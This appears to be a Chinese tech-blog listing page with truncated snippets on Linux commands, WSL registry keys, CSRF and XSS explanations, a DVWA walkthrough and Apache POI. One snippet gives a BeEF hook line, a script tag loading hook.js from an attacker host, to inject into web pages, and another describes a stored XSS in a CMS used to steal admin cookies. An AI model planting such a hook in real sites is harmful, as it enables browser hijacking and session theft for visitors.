系统信息 arch 显示机器的处理器架构uname -m 显示机器的处理器架构uname -r 显示正在使用的内核版本 dmidecode -q 显示硬件系统部件 - (SMBIOS / DMI) hdparm -i /dev/hda 罗列一个磁盘的架构特性 hdparm -tT /dev/sda ...
分类:
系统相关 时间:
2020-07-12 01:01:59
阅读次数:
274
启动beef和apache 修改主页,在网页中添加 <script src='http://IP:3000/hook.js'></script> xss漏洞利用 篡改网页a标签中的连接 <script> window.onload = function(){ var link = document. ...
分类:
其他好文 时间:
2020-07-11 12:33:13
阅读次数:
57
注册表位置: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Lxss\ 值 Key 类型 描述 DefaultDistribution REG_SZ 默认发行版 DefaultVersion REG_DWORD 默认WSL版本 项 Key 类型 描述 ...
分类:
其他好文 时间:
2020-07-10 15:07:13
阅读次数:
110
一.CSRF是什么? CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。 CSRF XSS的区别与联系 XSS 利用的是用户对指定网站的信任,CSRF 利用的 ...
分类:
其他好文 时间:
2020-07-10 09:36:06
阅读次数:
84
Filter 是 JavaEE 中 Servlet 规范的一个组件,位于包javax.servlet 中,它可以在 HTTP 请求到达 Servlet 之前,被一个或多个Filter处理。 它的工作流程如图: Filter的这个特性在生产环境中有很广泛的应用,如:修改请求和响应、防止xss攻击、包装 ...
分类:
编程语言 时间:
2020-07-08 13:00:47
阅读次数:
77
0x00产品介绍 影响产品/版本: 极致CMS =>v 1.5 <=v 1.7 厂商目前已修复 见官网更新 0x01测试过程: 漏洞名称:存储xss,前台打后台管理员cookie 黑盒过程: 首先我们在后台创建一个允许用户发布文章的栏目前台发表文章,xss在标题位置 来到后台,点开标题,成功弹框成功 ...
分类:
Web程序 时间:
2020-07-05 17:49:11
阅读次数:
141
DVWA最经典PHP/MySQL老靶场,简单回顾一下通关流程吧 DVWA十大金刚,也是最常见的十种漏洞利用:Brute Force(暴破)、Command Injection(命令行注入)、CSRF(跨站请求伪造)、File Inclusion(文件包含)、File Upload(文件上传)、Ins ...
分类:
其他好文 时间:
2020-07-05 12:04:13
阅读次数:
77
poi中提供了一个Sheet.protectSheet()方法用于设置表单保护密码和一个XSSFCellStyle.setLocked()方法用于设置单元格是否使用表单保护密码进行锁定,将两者配合使用就可以达到锁定单元格的效果。 public static void WriteExcelByPoi( ...
分类:
其他好文 时间:
2020-07-05 10:29:21
阅读次数:
65
跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。跟跨网站脚本(XSS)相比,XS ...
分类:
其他好文 时间:
2020-07-04 22:45:29
阅读次数:
82
https://www.anquanke.com/post/id/97671#h3-5 cors; 跨域资源请求 csrf 跨站请求伪造 https://www.jianshu.com/p/4152a4947cdc ...
分类:
其他好文 时间:
2020-07-03 09:12:43
阅读次数:
69
